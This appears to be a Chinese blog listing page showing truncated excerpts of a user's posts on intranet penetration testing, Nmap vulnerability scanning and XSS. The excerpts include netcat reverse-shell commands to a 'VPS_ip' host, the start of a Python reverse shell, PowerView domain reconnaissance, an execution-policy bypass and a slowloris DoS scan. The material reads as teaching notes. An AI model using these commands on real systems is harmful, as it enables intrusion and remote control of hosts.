自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(6)
  • 收藏
  • 关注

原创 内网安全-渗透测试指南(三)

反向Shell VPS上执⾏:nc -lvvp 9999 ⽬标主机上执⾏:[Linux] nc VPS_ip 9999 -e /bin/sh [Windows] nc VPS_IP 9999 -e c:\windows\system32\cmd.exe ⽬标主机没有NC时获取反向Shell Python python -c 'import socket,subprocess,os;s=socket....

2021-09-26 17:15:36 190

原创 内网安全-渗透测试指南(三)

利⽤Powershell收集域信息 powersploit\recon\powerview.ps1 Get-NetDomain:获取当前⽤户所在域名称 Get-NetUser:获取所有⽤户的详细信息 Get-NetDomainController:获取所有域控制器的信息 Get-NetComputer:获取域内所有机器的详细信息 Get-NetOU:...

2021-09-23 22:42:24 166

原创 内网安全-渗透测试指南(二)

Empire中的arpscan模块:usemodule situational_awareness/network/arpscan Nishang中的Invoke-ARPScan.ps1脚本 powershell.exe -exec bypass -Command"& {Import-Module c:\Invoke-ARPScan.ps1;Invoke-ARPScan -CIDR 192.168.1.1/24}" >> c:\log.txt 通过常规TC...

2021-09-22 22:41:18 191

原创 内网安全-渗透测试指南(一)

⼀、内⽹渗透测试基础 Powershell 查看执⾏策略 Get-ExecutionPolicy 设置执⾏策略 Set-ExecutionPolicy [options] Restricted 脚本不能执⾏【默认设置】 RemoteSigned 本地脚本可以运⾏,远程脚本不能运⾏ AllSigned 受信任的签名脚本才能运⾏ Unrestricted 允...

2021-09-21 21:20:33 269

原创 使用Nmap检测漏洞

使用Nmap检测漏洞http拒绝服务nmap --max-parallelism 800--script http-slowloris <target>IIS 短文件泄露nmap -p 8080 --script http-iis-short-name-brute <target>验证http中开启的-methods 方法nmap -T3 --script http-methods --script-args http.test-all=true,http.u...

2021-09-21 00:09:42 1401

原创 XSS简述

绕过推荐XSS绕过可以看看该文章:XSS过滤绕过速查表0.介绍跨站攻击,即Cross Site Script Execution(通常简写为XSS),是前端的漏洞,产生在浏览器一端的漏洞。它是指攻击者在网页中嵌入客户端脚本,主要利用js编写的恶意代码来执行一些想要的功能,也就是说它能干嘛是受到js的控制,那么js能执行出什么脚本代码就取决于它能干嘛。当用户使用浏览器浏览被嵌入恶意代码的网页时,恶意代码将会在用户的浏览器上执行。0.1.能干嘛常规用到的是盗取cookie、js做钓鱼攻击、流

2021-09-20 02:34:56 2087

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除